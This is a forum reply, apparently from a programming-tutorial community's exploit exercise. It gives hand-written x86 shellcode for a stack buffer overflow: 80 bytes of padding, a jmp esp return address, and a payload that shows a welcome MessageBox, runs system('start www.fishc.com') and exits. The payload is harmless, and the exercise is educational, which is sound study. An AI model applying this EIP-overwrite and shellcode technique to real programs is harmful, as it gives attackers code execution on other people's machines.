|
发表于 2012-8-9 15:07:33
|
显示全部楼层
本帖最后由 五月跳回家 于 2012-8-9 15:09 编辑
小甲鱼 发表于 2012-8-9 15:04
哟西,有的,把答案和具体的思路提交下即可哦~真不错~ 给shellcode吧
- char password[]=
- "a\x41\x41\x41"
- "\x66\x69\x73\x68"
- "\x66\x69\x73\x68"//前面填充80个字节栈
- "\x12\x45\xfa\x7f"//jmp esp(原eip)
- //MessageBoxA;
- "\x33\xDB\x53"//xor ebx,ebx
- "\x68\x63\x6F\x6D\x21"//push 216D6F63
- "\x68\x73\x68\x63\x2E"
- "\x68\x6F\x5F\x66\x69"
- "\x68\x6D\x65\x5F\x74"
- "\x68\x65\x6C\x63\x6F"//push 6F636C65
- "\x68\x5E\x5F\x5E\x77"//push 775E5F5E//ascii ^_^welcome_to_fishc.com!
- "\x8B\xC4"//mov eax, esp
- "\x53"//push ebx
- "\x50"
- "\x50"//push eax
- "\x53"
- "\xB8\x11\xEA\x34\x75"//mov eax,0x7534EA11 ;我电脑上MessageBoxA的地址
- "\xFF\xD0"//call eax
- //system("start www.fishc.com");
- "\x55" //push ebp
- "\x8B\xEC" //mov ebp, esp
- "\x83\xEC\x20" //sub esp, 20
- "\xB8\x73\x74\x61\x72" //mov eax, 72617473
- "\x89\x45\xE4" //mov dword ptr [ebp-1C], eax
- "\xB8\x74\x20\x77\x77" //www.fishc.com
- "\x89\x45\xE8"
- "\xB8\x77\x2E\x66\x69"
- "\x89\x45\xEC" //....
- "\xB8\x73\x68\x63\x2E" //....
- "\x89\x45\xF0" //....
- "\x66\xC7\x45\xF4\x63\x6F"
- "\xC6\x45\xF6\x6D"
- "\x33\xC0" //xor eax, eax
- "\x88\x45\xF7"
- "\x8D\x7D\xE4"
- "\x57"
- "\xBA\x77\xB1\x4C\x75" //system地址
- "\xFF\xD2" //call edx ;
- //ExitProcess(0);
- "\x53"//push ebx
- "\xB8\xE2\xBB\xAC\x75"//mov eax, 75ACBBE2 ;ExitProcess
- "\xFF\xD0"; //call eax;*/
复制代码 |
评分
-
查看全部评分
|